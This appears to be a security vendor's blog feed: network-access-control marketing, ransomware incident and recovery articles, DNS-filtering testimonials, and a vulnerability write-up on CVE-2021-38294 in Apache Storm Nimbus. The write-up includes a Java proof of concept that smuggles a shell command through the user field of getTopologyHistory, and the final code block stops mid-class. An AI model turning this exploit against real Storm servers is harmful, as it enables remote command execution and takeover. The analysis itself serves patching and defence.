
Unleashing the Power of Protection: Why Network Access Controls are Vital for Data Security

Safeguarding Data in the Digital Jungle

In today’s fast-paced digital world, where information flows freely and cyber threats lurk around every corner, organizations must fortify their data defenses. The need to protect sensitive information has become more critical than ever before. In this age of technological marvels, implementing robust network access controls has emerged as the key to ensuring the safety of valuable data. Join us as we explore why organizations worldwide are turning to these safeguards to shield their digital assets from harm.

The Importance of Network Access Controls

The Rise of Digital Vulnerabilities

With the proliferation of cloud computing, Internet of Things (IoT) devices, and remote working practices, organizations face an expanding attack surface. Malicious actors are constantly devising innovative methods to breach network defenses and gain unauthorized access to sensitive data. This evolving landscape demands a proactive approach to security, where network access controls play a pivotal role.


Fortifying the Perimeter

Network access controls act as sentinels, standing guard at the gates of an organization’s digital infrastructure. By defining and enforcing access policies, these controls ensure that only authorized personnel can enter the network. Whether it’s a virtual private network (VPN) for remote access or an authentication system for employees, these controls create a fortified perimeter that prevents unauthorized entry.

Granular Control, Enhanced Security

One of the significant advantages of network access controls is their ability to provide granular control over user access. Through user authentication, multi-factor authentication (MFA), and role-based access controls (RBAC), organizations can restrict access to specific resources, limit privileges, and reduce the risk of data breaches. By granting the right people the right level of access, organizations can maintain the delicate balance between security and operational efficiency.

Defense in Depth

In an era where a single breach can lead to disastrous consequences, organizations must adopt a layered defense strategy. Network access controls complement other security measures, such as firewalls, intrusion detection systems, and encryption. By adding an additional layer of protection, these controls fortify the overall security posture of an organization, making it harder for attackers to penetrate the network perimeter.

Regulatory Compliance

As data privacy regulations continue to evolve worldwide, organizations must demonstrate compliance with stringent standards. Network access controls play a vital role in meeting these requirements. By implementing robust access controls and audit trails, organizations can showcase their commitment to data protection, ensuring that they are in line with regulations such as the General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA).

Safeguarding Business Continuity

The impact of a data breach can be catastrophic, leading to reputational damage, financial loss, and disrupted operations. By implementing network access controls, organizations can minimize the risk of unauthorized access and mitigate the potential fallout of a security incident. Protecting data not only safeguards an organization’s operations but also fosters trust among customers, partners, and stakeholders.


Preservation Requires Network Access Controls

In the digital era, where data is the lifeblood of organizations, protecting sensitive information has become paramount. Implementing network access controls serves as a robust line of defense against cyber threats, ensuring that only authorized individuals can access valuable data. By fortifying the network perimeter, providing granular control, and adhering to regulatory compliance, organizations can safeguard their digital assets and preserve their reputation. So, don’t wait—unleash the power of protection with network access controls and embark on a secure digital journey where your data is shielded from the ever-present threats of the digital jungle.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

Ransomware Recovery for Breached Networks: A Deep Dive Into Data Recovery Across Industries

On a seemingly ordinary day in Curry County, Oregon (April 26, 2023, to be precise), a sheriff’s dispatch discovered a world gone silent and files rendered impenetrable, replaced with cold encryption that barred their way.

This was no ordinary assault; this was an ambush in the form of a meticulously executed ransomware attack. The lifeblood of the county’s daily operations—networks, servers, vital online services—had all been infected, leading to a paralysis that shocked the local community to a standstill.

A daunting reality set in for County Commissioner Brad Alcorn, “Everything’s got to start over… We are essentially starting from scratch.” The enemy behind this devastating cyber onslaught was revealed to be Royal, an infamous ransomware group known for their ruthless precision and escalating global attacks.

The Curry County incident serves as a cautionary tale about the pervasive threats posed by ransomware and the reality of ransomware recovery – ransomware data recovery isn’t always possible. It emphasizes the need for robust and adaptable cybersecurity measures in the face of rapidly evolving digital dangers.

With this in mind, let’s dive deeper into the ever-evolving ransomware landscape and the challenges companies face in recovering their critical data following a cyber attack.

Ransomware Now: A Snapshot

● The Verizon Data Breach Investigations Report 2022 highlights an alarming rise in ransomware attacks during that year, accounting for a quarter of all data breaches.
● Sophos’s report, “The State of Ransomware 2022,” reveals a troubling upward trend: a staggering 66% of organizations fell victim to ransomware in 2021, a surge of 78% from 2020.
● While all industries are at risk, some are more vulnerable than others. Industrial goods and services, technology, construction and materials, travel and leisure, healthcare, education, and government sectors are the top targets of these attacks.
● Cybereason’s survey points out the profound impacts of ransomware on the workforce. It led to layoffs in almost 40% of affected companies and prompted a 35% resignation rate at the executive level. One-third of these businesses had to pause operations temporarily.
● Small businesses are at heightened risk, according to an UpCity study, as only 50% of U.S. small businesses have established cybersecurity measures.
● Ransomware attackers mainly exploit known vulnerabilities in the systems they target.
● Phishing emails serve as the main gateway for ransomware attacks, illustrating the importance of cybersecurity awareness among employees.

These statistics aren’t meant to be alarmist but rather drive home the unquestionable and dire threat ransomware attacks pose in 2023. Because while it’s true that ransomware attacks are nothing new, they are evolving – they’re more frequent, sophisticated, and severe than in previous years.

It’s essential to understand this point. You’re more likely to fall victim to a ransomware attack today and, equally, more likely to need to navigate ransomware data recovery.

Ransomware Attacks & Recovery Across Industries

Ransomware data recovery is a gamble. It hinges on the decryption key that the hacker might provide post-payment. But there’s no guarantee. Hackers can disappear after payment, leaving data forever locked. Worse still, some malware strains irreversibly damage or delete files during the encryption process. Additionally, if backups (your route to self-recovery) are infected or nonexistent, data loss is almost inevitable.

The best way to understand the process and effects of these attacks is to look at some high-profile attacks more closely.

Government and Public Services

Oakland Attack: In late April, a ransomware attack struck Oakland, crippling the city’s email systems, phone lines, and some websites. While the attack didn’t touch emergency services, it substantially disrupted non-emergency ones. The city kept the ransom demand under wraps and refused to pay. Instead, they collaborated with law enforcement and cybersecurity professionals to investigate the attack and restore systems. The city also cautioned residents to watch for scams and phishing attempts stemming from the attack.

Dallas Attack: Dallas found itself grappling with the aftermath of a ransomware attack by the Royal ransomware gang. The attack severely disrupted systems running police, fire department, courts, and critical infrastructure operations. For two weeks, the city engaged in a massive recovery effort. Police officers reverted to handwritten notes, while firefighters entered dangerous scenarios without the usual digital dispatch information. Following criticism, the city restored some dispatch systems, albeit with notable delays. As the city’s chief information security officer Brian Gardner noted, the city would “be working at this for weeks and months to do all the clean up.”

Education

In 2020, a ransomware attack hit Baltimore County Public Schools (BCPS). The school, with 115,000 students, described it as a “catastrophic attack on our technology system.” The cause? An error by a contractor, says a report by Maryland’s Office of the Inspector General for Education.

The attack closed the school for two days in November and costs exceeded $9.6 million. The report suggests the school’s IT division failed to protect sensitive data and ignored audit recommendations. Critically, a phishing email went unnoticed for 15 days. A staffer received it and contacted tech support, who unknowingly released malware into the network. The antivirus couldn’t detect this malware and it stealthily disabled network functions, facilitating the attack.

Regarding ransomware data recovery, the FBI recommended that BCPS refrain from sharing information about the attack during and after the investigation as a security measure. However, the Office of the Inspector General for Education’s report commended the school for its prompt and comprehensive recovery actions. The measures implemented have been lauded as a leading example of cyber defense across the nation.

We do know that BCPS transitioned its database servers to an encrypted cloud environment, departing from their previous on-premise setup. This shift was a critical step in safeguarding against future cyber threats. The school also addressed earlier technology infrastructure needs identified in the Superintendent’s proposed operating budget. While initial requests for these improvements weren’t funded, the school’s response to the cyberattack ultimately accelerated its technology infrastructure upgrades.

Healthcare

The healthcare industry is a prime target for ransomware attacks due to the sensitive and highly lucrative data they store. Here are some recent healthcare ransomware attacks.

Morris Hospital: Morris Hospital & Healthcare Centers in Illinois faced a significant cyberattack on May 22, 2023. The Royal ransomware group, the same group behind the Curry County attack, claimed responsibility. As part of ransomware recovery efforts, Morris brought in experts to investigate and check patient data exposure. They found that their primary medical record system was safe, but a network storing patient data was compromised. Luckily, already pre-installed security measures helped lessen the attack’s damage. The hospital promised to keep patients and the public updated.

Norton Healthcare: On May 9, 2023, Norton Healthcare in Kentucky suffered a cybersecurity hit. They regained control of their network but shifted to manual data recording to maintain patient care during the ransomware data recovery period. The attack led to delays in services like medical imaging and lab test results and also caused a backlog in patient portal messages.

Tennessee Orthopedic Clinics: Tennessee Orthopedic Clinics experienced a security breach between March 20 and March 24, 2023. The intrusion threatened patient information, including names, contact details, and health records. The clinic engaged experts for a thorough investigation and has since implemented more robust security measures to prevent future breaches. The number of affected patients remains unclear, but the clinic has informed the HHS’ Office for Civil Rights about the incident.

Industrial and Manufacturing

In 2020, Advantech, a prominent IoT manufacturer based in Taiwan, fell victim to a significant ransomware attack. The first indication of the breach came when the company received a ransom demand for a staggering 750 bitcoins, roughly equivalent to $14 million at the time.

The attackers offered a chilling proposition: pay up, and they would delete all stolen data and restore the encrypted systems. To further intimidate Advantech, the criminals published over 3GB of data on their leak site, claiming that this was a mere two percent of the total data they had exfiltrated.

Despite the apparent pressure, Advantech remained tight-lipped about whether the ransom was ultimately paid. Instead, the company emphasized its efforts toward recovery and reassured stakeholders that operations were gradually returning to normal. The company rolled out a variety of new detection and protection strategies, along with response actions to curtail the risks of similar attacks in the future.

This attack is highly significant because, according to a Dragos report, ransomware attacks on industrial firms rose 87% in 2022.

How Does Ransomware Removal Work?

Okay, let’s say ransomware locks up your systems. What next?

Ransomware removal is an intricate process that requires a comprehensive, step-by-step approach. When carried out correctly, it can mitigate the damage inflicted and ensure the safety of your system in the future.

Step 1: Disconnect the affected computer from the network or internet. This is paramount as it prevents further propagation of the ransomware and limits any potential damage to other systems within the network. The disconnection isolates the ransomware, containing it within the infected device.

Step 2: Identifying the specific type and variant of the ransomware. This is a critical part of the process, as different types of ransomware require other removal methods. Understanding the specific ransomware variant helps to determine the most effective approach for removal and can guide the selection of appropriate anti-malware tools or procedures.

Step 3: Utilize anti-malware or antivirus software to scrutinize the infected computer and eliminate the ransomware. It’s important to note that the efficacy of these software tools may vary based on the sophistication of the ransomware. Some advanced forms of ransomware may resist automated removal, necessitating manual intervention for their complete eradication.

Step 4: If backups of your files are available, you should use them to restore encrypted files. It’s essential, however, to ensure that the backup itself is clean and not infected with the ransomware before proceeding. A compromised backup can reintroduce the ransomware, undoing all previous removal efforts.

Step 5: In situations where a backup is not accessible or if the encrypted files cannot be restored, you may have to consider using a decryption tool, provided one is available. Note that decryption tools are ransomware-specific and may not exist for all variants. Their success rate also varies, and they might not always be able to decrypt your files.

Step 6: After successful ransomware removal and file restoration, ensure that your operating system, software applications, and security software are fully updated. Installing the latest patches and updates enhances your system’s resistance against potential future attacks. Regular updating is an integral part of maintaining a robust defense against ransomware and other forms of malware.

Strategies for Improving Chances of Data Recovery Following a Ransomware Attack

Of course, the best strategy is to not fall victim to a ransomware attack to begin with. Of course, this isn’t always possible. However, there are steps you can take that either reduce the likelihood of falling victim or increase your chances of ransomware data recovery following an attack:

  • Maintain Regular Backups: Regularly back up all critical data and ensure the backups are stored offsite or on a separate network, inaccessible to the infected systems.
  • Implement a Disaster Recovery Plan (DRP): Develop a comprehensive disaster recovery plan which outlines all steps to take in the event of a ransomware attack, including restoring backups and securing compromised systems.
  • Encrypt Sensitive Data: Encryption of sensitive data can help to protect it even if attackers gain access to the network.
  • Train Employees: Regularly conduct cybersecurity training to reduce the risk of phishing attacks, a common vector for ransomware.
  • Update and Patch Systems: Keep all systems updated with the latest patches to minimize vulnerabilities that ransomware might exploit.
  • Monitor Network Activity: Implement network monitoring to detect unusual activity that might signal a ransomware infection.
  • Use Robust Antivirus Software: Install and maintain a reliable antivirus program to help identify and remove potential threats.
  • Implement Multi-factor Authentication (MFA): MFA can help secure systems and make unauthorized access more difficult.

It’s primarily advised to seek professional advice for proper setup and maintenance of security measures, and include them in any recovery process. As always, in the event of a ransomware attack it’s critical to immediately inform local law enforcement and report to appropriate cybercrime units.

Remember, prevention is always better than recovery when it comes to ransomware attacks. Regular reviews of cybersecurity measures and updates to the disaster recovery plan can help to improve response time and effectiveness if an attack does occur.

Final Thoughts

Ransomware attacks pose a grave and escalating threat across various industries, causing extensive damage to data and networks. With this in mind, robust, systematic recovery efforts are not just beneficial but crucial. Proper understanding and implementation of these efforts can significantly mitigate the destructive impact and help maintain the integrity of critical data and systems.



Examining the Tallahassee Memorial Hospital Cyber Attack

In late January 2023, Tallahassee Memorial Healthcare (TMH), a non-profit health system serving patients in North Florida and South Georgia, experienced a cyber attack that forced it to operate under emergency downtime procedures for around two weeks. The cyber attack was first detected on February 3, when TMH’s IT team noticed unusual system activity. The hospital’s systems were immediately secured, and a third-party cybersecurity firm was engaged to investigate the breach. 

The investigation determined that unauthorized individuals had access to TMH’s systems between January 26 and February 2, and exfiltrated files during that time. The files that were stolen included names, Social Security numbers, medical record and patient account numbers, addresses, dates of birth, health insurance information, dates of service, treatment plans, diagnoses, visit notes, prescription information, and physician names.

As a result of the Tallahassee Memorial Hospital cyber attack, affected patients were notified of the breach on March 31 and were offered free credit monitoring and identity theft protection services. The hospital also said that it did not believe the cyber attack had any impact on patient care.

Could NAC Have Stopped the Tallahassee Memorial Hospital Attack?

Network access control (NAC) could have helped to stop the Tallahassee Memorial Hospital cyber attack. NAC is a security technology that controls who and what devices can access a network. It can be used to block unauthorized devices from accessing the network, and to enforce security policies for authorized devices.

In the case of the Tallahassee Memorial Hospital cyber attack, NAC could have helped to prevent the hackers from gaining access to the network in the first place. If the hackers’ devices had been blocked from accessing the network, they would not have been able to exploit the vulnerabilities that were used to launch the attack.

In addition to preventing unauthorized access, NAC can also be used to detect and respond to security incidents. For example, if a NAC system detects that an unauthorized device has gained access to the network, it can be configured to quarantine the device and notify security personnel.

Overall, NAC is a valuable security tool that can help to protect organizations from cyber attacks. In the case of the Tallahassee Memorial Hospital cyber attack, NAC could have helped to prevent the attack from happening in the first place, or to detect and respond to the attack more quickly.

Here are some specific ways that NAC could have helped TMH:

  • Block unauthorized devices from accessing the network.
  • Enforce security policies for authorized devices.
  • Detect and respond to security incidents.
  • Improve visibility into network traffic.
  • Provide reporting and auditing capabilities.

By taking these steps, NAC could have helped TMH to improve its cybersecurity posture and make it more difficult for hackers to successfully attack the organization.

A Good Reminder: It’s Important to Have a Prevention Plan

The Tallahassee Memorial Hospital cyber attack is a reminder of the importance of cybersecurity for healthcare organizations. Healthcare data is a valuable target for hackers, and organizations need to take steps to protect it. This includes implementing strong security measures, such as firewalls, intrusion detection systems, and data encryption. Organizations should also train their employees on cybersecurity best practices, such as how to spot phishing emails and how to create strong passwords.

The cyber attack on TMH is also a reminder of the importance of having a plan in place in case of a cyber attack. This plan should include steps for how to secure the organization’s systems, how to notify affected individuals, and how to recover from the attack. Organizations should regularly test their plans to make sure that they are effective.


New Case Studies: Client Success Stories with SafeDNS

We’re thrilled to share some exciting new case studies from our valued clients at SafeDNS! Our latest success stories come from Fox Techno Service, Hack-Inn, and Deteinco SLU. These companies have experienced firsthand the benefits of implementing SafeDNS solutions to safeguard their online activities. Here’s what they had to say:

Wilco Ettema from Fox Techno Service emphasized, “The world wide web has many dangers. A large part, if not all, is captured by a properly configured SafeDNS solution. It gives the client and the MSP an extra layer of security.”

Hack-Inn, another satisfied client, expressed their satisfaction with the collaboration, stating, “The cooperation with SafeDNS is fine. Fast response times. I would advise others to consider hiring the solution as it is a very good option.”

Simó Albareda from Deteinco SLU shared their positive experience, saying, “Highly efficient hardware-independent solution, reasonable price, ease of deployment and management, and great support. We are very happy with the SafeDNS solution.”

We encourage you to read the full case studies on our website, where you’ll find more details about how SafeDNS has helped these clients enhance their online security. We constantly update our case studies section to showcase the diverse range of organizations benefiting from SafeDNS solutions. At SafeDNS, we remain committed to providing top-notch protection against online threats. With our advanced technology, proactive approach, and dedicated support, we aim to ensure a secure and productive online environment for businesses of all sizes. Stay tuned for more exciting updates and success stories from our clients!


About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

CVE-2021-38294: Apache Storm Nimbus Command Injection

Introduction

CVE-2021-38294 is a command injection vulnerability affecting the Nimbus server in Apache Storm, specifically the getTopologyHistory service. A successfully crafted request to the Nimbus server exploits this vulnerability, leading to execution of a malicious command and takeover of the server. The affected versions are 1.x prior to 1.2.4 and 2.x prior to 2.2.1.
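A defender's first question is whether a given Nimbus install sits in the affected range. The following version triage helper is an added example (not part of the original write-up or of Apache Storm); it encodes only the two fixed versions stated above and treats any other major line as not listed, and it tolerates the suffixed version strings (e.g. "2.2.0-SNAPSHOT") that inventories often contain.

```python
"""Decide whether an Apache Storm version string falls in the range
affected by CVE-2021-38294 (1.x before 1.2.4, 2.x before 2.2.1)."""
import re
from typing import Dict, Iterable, Tuple

# First fixed release per major line, taken from the advisory text above.
# Major lines not listed here (e.g. 3.x) are reported as not affected.
FIXED_IN: Dict[int, Tuple[int, int, int]] = {1: (1, 2, 4), 2: (2, 2, 1)}


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse 'MAJOR.MINOR.PATCH' with an optional suffix such as '-SNAPSHOT'.

    A missing minor or patch component is treated as 0, so '2.2' == '2.2.0'.
    Raises ValueError for strings that do not start with a numeric version.
    """
    match = re.match(r"^\s*v?(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    if not match:
        raise ValueError(f"not a version string: {version!r}")
    major, minor, patch = (int(g) if g is not None else 0 for g in match.groups())
    return major, minor, patch


def is_affected(version: str) -> bool:
    """Return True if this Storm version is vulnerable to CVE-2021-38294."""
    parsed = parse_version(version)
    fixed = FIXED_IN.get(parsed[0])
    if fixed is None:
        return False  # major line not named on this page as affected
    # Tuple comparison: anything strictly before the fixed release is affected.
    return parsed < fixed


def triage(versions: Iterable[str]) -> Dict[str, str]:
    """Map each inventory entry to 'affected', 'not affected' or 'unparseable'.

    Unparseable entries are surfaced rather than silently skipped so that a
    malformed inventory row cannot hide a vulnerable host.
    """
    result: Dict[str, str] = {}
    for v in versions:
        try:
            result[v] = "affected" if is_affected(v) else "not affected"
        except ValueError:
            result[v] = "unparseable"
    return result


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = ["1.2.3", "1.2.4", "2.2.0-SNAPSHOT", "2.2.1", "3.0.0", "unknown"]
    for entry, status in triage(sample).items():
        print(f"{entry:16} {status}")
```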

What is Apache Storm?

Apache Storm is a distributed system for processing big data in real time. It is designed to handle large volumes of data reliably and at scale, and it operates as a streaming data framework that allows high ingestion rates and efficient data processing. Storm itself is stateless; it manages distributed environments and cluster state through Apache ZooKeeper. It provides a straightforward way to perform parallel manipulations on real-time data, enabling a wide range of processing tasks. Apache Storm is used extensively by enterprises and organizations such as Twitter, which processes tweets and clicks in its Publisher Analytics Products suite and benefits from deep integration with the Twitter infrastructure.

In Apache Storm, spouts and bolts are connected to form a topology, which represents the real-time application logic as a directed graph. Spouts emit data that is processed by bolts, and the output of a bolt can be passed to another bolt. Storm keeps the topology running until it is explicitly stopped. The execution of spouts and bolts in Storm is referred to as tasks; each spout and bolt can have multiple instances running in separate threads. These tasks are distributed across multiple worker nodes, which listen for jobs and manage the execution of tasks.
Finally, the components we need to know well are Nimbus and the Supervisors. Nimbus, known as the master node, plays a central role in the Storm framework: it is responsible for running the Storm topology by analyzing the topology, collecting the tasks to be executed and distributing them to available Supervisor nodes. A Supervisor is a worker node that can have multiple worker processes; its job is to delegate tasks to these worker processes, and each worker process can spawn multiple executors based on the required workload and execute the assigned tasks. Communication between Nimbus and the Supervisors is facilitated through an internal distributed messaging system, ensuring efficient coordination and data exchange within the Storm cluster.

Testing Lab

Let’s start building our testing lab. First, we need ZooKeeper installed; you can download it from here. After downloading, extract it and create a directory named data inside the ZooKeeper directory:
mkdir data
Next, copy the sample configuration to use as the main configuration file for ZooKeeper:
cp conf/zoo_sample.cfg conf/zoo.cfg
Open the zoo.cfg file and set the data directory to the path of the directory we created previously. Now, start ZooKeeper:
./bin/zkServer.sh start
The server has started; verify it by running the CLI:
./bin/zkCli.sh
Now it’s time to install and start Apache Storm. Download it from here. First, create another folder named data inside the Apache Storm directory:
mkdir data
After that, open the configuration file conf/storm.yaml and add the following to the file:
# Storm configuration file

# Nimbus settings
nimbus.seeds: ["localhost"]  # List of Nimbus hostnames or IP addresses
nimbus.host: "localhost"
# ZooKeeper settings
storm.zookeeper.servers:
  - "localhost"

# Storm UI settings
ui.port: 8081  

# Supervisor settings
supervisor.slots.ports:
  - 6700
  - 6701
  - 6702

# Worker settings
worker.childopts: "-Xmx768m"

# Topology settings
topology.debug: true  # Enable debugging for topologies
topology.max.spout.pending: 1000  # Maximum number of pending messages per spout

# Log4j settings
worker.log.level: INFO  # Log level for Storm workers
Don’t forget to replace the ZooKeeper and Nimbus server addresses with your IP (the same machine’s IP). Let’s start it now. Starting the Nimbus server:
./bin/storm nimbus
Starting the Supervisor:
./bin/storm supervisor
Starting the Storm UI:
./bin/storm ui
Visit the UI on port 8081, as we configured:

Patch Diffing

You can download the source code from here; the patch is here on GitHub. It shows the changes made to storm-client/src/jvm/org/apache/storm/utils/ShellUtils.java, where the getGroupsCommand() method, which returned the command used to retrieve the groups on the system as a string array, was deleted. Then the following function was modified:
##### Before
public static String[] getGroupsForUserCommand(final String user) {
    if (WINDOWS) {
        throw new UnsupportedOperationException("Getting user groups is not supported on Windows");
    }
    //'groups username' command return is non-consistent across different unixes
    return new String[]{
        "bash", "-c", "id -gn " + user
                      + "&& id -Gn " + user
    };
}

##### After
public static String[] getGroupsForUserCommand(final String user) {
    if (WINDOWS) {
        throw new UnsupportedOperationException("Getting user groups is not supported on Windows");
    }
    //'groups username' command return is non-consistent across different unixes
    return new String[]{"id", "-Gn", user};
}
The modification of getGroupsForUserCommand(String user) replaces the shell-wrapped command with a more concise one. We can see clearly from the patch diffing that the command injection occurs in this part, specifically in the user parameter that gets passed to getGroupsForUserCommand(), and we can also notice the bash -c in the string array. Let’s move to the analysis to understand how this happens.

The Analysis

When we go to apache-storm-2.2.0/storm-client/src/jvm/org/apache/storm/utils/ShellUtils.java and scroll down past the getGroupsForUserCommand() method, we can see the following: this run() method is declared protected, which means it can only be accessed within the same package or by subclasses. It implements a control flow that determines whether a specified interval has passed since the last execution; if the interval has passed, it resets the exitCode and proceeds to execute the runCommand() method. Scrolling further down, we can see the runCommand() method. It’s a long method, so let’s break it down and explain it:
ProcessBuilder builder = new ProcessBuilder(getExecString());
Timer timeOutTimer = null;
ShellTimeoutTimerTask timeoutTimerTask = null;
timedOut = new AtomicBoolean(false);
completed = new AtomicBoolean(false);
First, it creates a new ProcessBuilder object with the executable command obtained from the getExecString() method, which returns the command value. Then it declares two variables of type Timer and ShellTimeoutTimerTask, initialized to null, which will be used to handle timeouts for the command execution. Finally, it creates two AtomicBoolean variables named timedOut and completed and initializes them to false; they are used to track the status of the command execution.
if (environment != null) {
    builder.environment().putAll(this.environment);
}
if (dir != null) {
    builder.directory(this.dir);
}

builder.redirectErrorStream(redirectErrorStream);
process = builder.start();
The first if condition checks whether the environment variable is not null; if it isn’t, it retrieves the environment of the ProcessBuilder instance using builder.environment() and adds all the key-value pairs from the this.environment map. The second if condition checks whether the dir variable is not null; if it isn’t, it sets the working directory of the process to this.dir using builder.directory(this.dir). Finally, it configures the ProcessBuilder to redirect the error stream of the process: if redirectErrorStream is true, the error stream is merged with the standard output stream. It then starts the process using the configured ProcessBuilder by calling the start() method.
if (timeOutInterval > 0) {
    timeOutTimer = new Timer("Shell command timeout");
    timeoutTimerTask = new ShellTimeoutTimerTask(this);
    //One time scheduling.
    timeOutTimer.schedule(timeoutTimerTask, timeOutInterval);
}
final BufferedReader errReader =
    new BufferedReader(new InputStreamReader(process
                                                 .getErrorStream()));
BufferedReader inReader =
    new BufferedReader(new InputStreamReader(process
                                                 .getInputStream()));
final StringBuffer errMsg = new StringBuffer();

// read error and input streams as this would free up the buffers
// free the error stream buffer
Thread errThread = new Thread() {
Moving on, this if condition checks whether timeOutInterval is greater than 0; if so, it sets up a timer named "Shell command timeout" and schedules the timeoutTimerTask to run after the specified timeOutInterval in milliseconds. After that it creates two BufferedReader objects, errReader and inReader, to read the error and input streams of the process, respectively; the process.getErrorStream() and process.getInputStream() methods return the streams associated with the running process. Next, it creates a StringBuffer named errMsg to store the error message and a new Thread named errThread, an anonymous subclass of Thread with an overridden run() method.
@Override
public void run() {
    try {
        String line = errReader.readLine();
        while ((line != null) && !isInterrupted()) {
            errMsg.append(line);
            errMsg.append(System.getProperty("line.separator"));
            line = errReader.readLine();
        }
    } catch (IOException ioe) {
        LOG.warn("Error reading the error stream", ioe);
    }
}
};
try {
errThread.start();
} catch (IllegalStateException ise) {
//ignore
}
try {
parseExecResult(inReader); // parse the output
// clear the input stream buffer
String line = inReader.readLine();
while (line != null) {
    line = inReader.readLine();
}
// wait for the process to finish and check the exit code
exitCode = process.waitFor();
// make sure that the error thread exits
joinThread(errThread);
completed.set(true);
//the timeout thread handling
//taken care in finally block
if (exitCode != 0) {
    throw new ExitCodeException(exitCode, errMsg.toString());
}
} catch (InterruptedException ie) {
throw new IOException(ie.toString());
} finally {
if (timeOutTimer != null) {
    timeOutTimer.cancel();
}
// close the input stream
try {
    // JDK 7 tries to automatically drain the input streams for us
    // when the process exits, but since close is not synchronized,
    // it creates a race if we close the stream first and the same
    // fd is recycled.  the stream draining thread will attempt to
    // drain that fd!!  it may block, OOM, or cause bizarre behavior
    // see: https://bugs.openjdk.java.net/browse/JDK-8024521
    //      issue is fixed in build 7u60
    InputStream stdout = process.getInputStream();
    synchronized (stdout) {
        inReader.close();
    }
} catch (IOException ioe) {
    LOG.warn("Error while closing the input stream", ioe);
}
if (!completed.get()) {
    errThread.interrupt();
    joinThread(errThread);
}
try {
    InputStream stderr = process.getErrorStream();
    synchronized (stderr) {
        errReader.close();
    }
} catch (IOException ioe) {
    LOG.warn("Error while closing the error stream", ioe);
}
process.destroy();
lastTime = System.currentTimeMillis();
}
In summary, it defines a thread that reads the error stream and appends its contents to the errMsg StringBuffer, starts that thread, and then parses the output from the input stream using the parseExecResult method. After that, it drains what remains of the input stream buffer. Then it waits for the process to finish and retrieves the exit code. Next, it ensures that the error thread has exited by joining it, and if the exit code is not zero, it throws an ExitCodeException with the error message. In the finally block, it cancels the timeout timer if one exists, closes the input stream, interrupts the error thread if the command execution has not completed, closes the error stream, destroys the process, and updates the lastTime variable with the current time. So, how can the command actually get injected, and where is the point at which the user supplies the malicious input? Let’s discover it by going through the PoC:
import org.apache.storm.utils.NimbusClient;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

public class ThriftClient {
    public static void main(String[] args) throws Exception {
        HashMap config = new HashMap();
        List<String> seeds = new ArrayList<String>();
        seeds.add("localhost");
        config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
        config.put("storm.thrift.socket.timeout.ms", 60000);
        config.put("nimbus.seeds", seeds);
        config.put("storm.nimbus.retry.times", 5);
        config.put("storm.nimbus.retry.interval.millis", 2000);
        config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
        config.put("nimbus.thrift.port", 6627);
        config.put("nimbus.thrift.max_buffer_size", 1048576);
        config.put("nimbus.thrift.threads", 64);
        NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);

        // send attack
        nimbusClient.getClient().getTopologyHistory("foo;touch /tmp/pwned;id ");
    }
}
Looking at the PoC, we can notice that it connects to the Storm cluster by first building the configuration, then connecting to the cluster at localhost on port 6627 with that configuration, and then calling the getTopologyHistory() function on the Storm client. This is where the command injection happens. Let’s take a look at the implementation of Nimbus and of the function. Under apache-storm-2.2.0/storm-server/src/main/java/org/apache/storm/nimbus/NimbusHeartbeatsPressureTest.java, which implements a Nimbus heartbeats pressure test, the class starts by defining its configuration variables. After that, as we can see, it initializes the Config for the heartbeats pressure test. Scrolling further down, we can see clearly in the HeartbeatSendTask that it uses the defined NimbusClient named client to create a new client connection, passing the previously initialized Config with the Nimbus host and port. Finally, we can see it connect to the configured client and call the sendSupervisorWorkerHeartbeats() method, which can be called remotely. Now, if we go to the apache-storm-2.2.0/storm-server/src/main/java/org/apache/storm/daemon/nimbus/Nimbus.java class, we can see the method is clearly accessible remotely, and if we search for the getTopologyHistory() method, we can see that it takes the user as a parameter to retrieve the topology history information for that user. This is where the command gets injected: going back to the patch diffing at the start of the analysis, where group information about the user is returned, the user value can be supplied and manipulated by anyone through the getTopologyHistory() method, resulting in malicious command injection.
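The following is an added Java example, not Apache Storm's own code, that ties the patch diff to the injection point analysed above: for one input it builds both the pre-patch bash -c argv and the patched argv, runs only the patched form through ProcessBuilder the way runCommand() does, and adds a username allowlist as defense in depth. The class and method names, the allowlist pattern and the sample input are assumptions of this example, not something the project ships.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.regex.Pattern;

// Added example, not Apache Storm's own code: contrasts the pre-patch shell-wrapped
// command with the post-patch argv form and adds an allowlist a caller could apply.
public class GroupsCommandDemo {
    // Mirrors the vulnerable form from the patch diff: the user string is spliced
    // into a script that bash parses, so ';', '&&', '$(...)' etc. are interpreted.
    static String[] vulnerableCommand(String user) {
        return new String[]{"bash", "-c", "id -gn " + user + "&& id -Gn " + user};
    }

    // Mirrors the patched form: the user string is a single argv element and no
    // shell is involved, so metacharacters reach id(1) as literal characters.
    static String[] patchedCommand(String user) {
        return new String[]{"id", "-Gn", user};
    }

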